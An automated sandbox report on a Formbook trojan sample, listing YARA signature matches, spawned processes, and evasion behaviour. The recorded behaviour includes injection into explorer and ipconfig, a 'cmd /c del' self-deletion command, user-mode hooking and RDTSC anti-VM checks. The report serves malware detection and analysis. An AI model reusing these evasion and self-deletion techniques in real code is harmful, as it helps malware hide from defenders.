              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: i5NDVAFg42.exe, type: SAMPLEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: i5NDVAFg42.exe PID: 3060, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: ipconfig.exe PID: 1772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: i5NDVAFg42.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: i5NDVAFg42.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@11/8
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
              Source: i5NDVAFg42.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: i5NDVAFg42.exeReversingLabs: Detection: 89%
              Source: unknownProcess created: C:\Users\user\Desktop\i5NDVAFg42.exe C:\Users\user\Desktop\i5NDVAFg42.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\i5NDVAFg42.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exeJump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\i5NDVAFg42.exe"Jump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: i5NDVAFg42.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: ipconfig.pdb source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: i5NDVAFg42.exe, i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CF7090 pushad ; iretd 0_2_00CF7096
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFE266 push E89010BFh; ret 0_2_00CFE582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFEA1C push dword ptr [D4EF9124h]; ret 0_2_00CFEA3E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD4B5 push eax; ret 0_2_00CFD508
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE2D89 push ebp; iretd 0_2_00CE2D8A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD56C push eax; ret 0_2_00CFD572
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD50B push eax; ret 0_2_00CFD572
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CFD502 push eax; ret 0_2_00CFD508
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0175225F pushad ; ret 0_2_017527F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017527FA pushad ; ret 0_2_017527F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017809AD push ecx; mov dword ptr [esp], ecx0_2_017809B6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0175283D push eax; iretd 0_2_01752858
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01759939 push es; iretd 0_2_01759940
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D6B02 push esp; retn 0000h2_2_0E4D6B03
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D6B1E push esp; retn 0000h2_2_0E4D6B1F
              Source: C:\Windows\explorer.exeCode function: 2_2_0E4D69B5 push esp; retn 0000h2_2_0E4D6AE7
              Source: C:\Windows\explorer.exeCode function: 2_2_105EF9B5 push esp; retn 0000h2_2_105EFAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_105EFB1E push esp; retn 0000h2_2_105EFB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_105EFB02 push esp; retn 0000h2_2_105EFB03
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_039609AD push ecx; mov dword ptr [esp], ecx4_2_039609B6
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310E266 push E89010BFh; ret 4_2_0310E582
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310EA1C push dword ptr [D4EF9124h]; ret 4_2_0310EA3E
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_030F2D89 push ebp; iretd 4_2_030F2D8A
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03107090 pushad ; iretd 4_2_03107096
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D502 push eax; ret 4_2_0310D508
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D50B push eax; ret 4_2_0310D572
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D56C push eax; ret 4_2_0310D572
              Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0310D4B5 push eax; ret 4_2_0310D508
              Source: i5NDVAFg42.exeStatic PE information: section name: .text entropy: 7.410197142919947

              Persistence and Installation Behavior

              barindex
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

              Hooking and other Techniques for Hiding and Protection

              barindex
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEC
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeRDTSC instruction interceptor: First address: 0000000000CE9904 second address: 0000000000CE990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeRDTSC instruction interceptor: First address: 0000000000CE9B7E second address: 0000000000CE9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000030F9904 second address: 00000000030F990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000030F9B7E second address: 00000000030F9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_00CE9AB0 rdtsc 0_2_00CE9AB0
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1970Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7969Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9833Jump to behavior
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeAPI coverage: 1.7 %
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.7 %
              Source: C:\Windows\explorer.exe TID: 2260Thread sleep count: 1970 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2260Thread sleep time: -3940000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 2260Thread sleep count: 7969 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2260Thread sleep time: -15938000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6172Thread sleep count: 136 > 30Jump to behavior
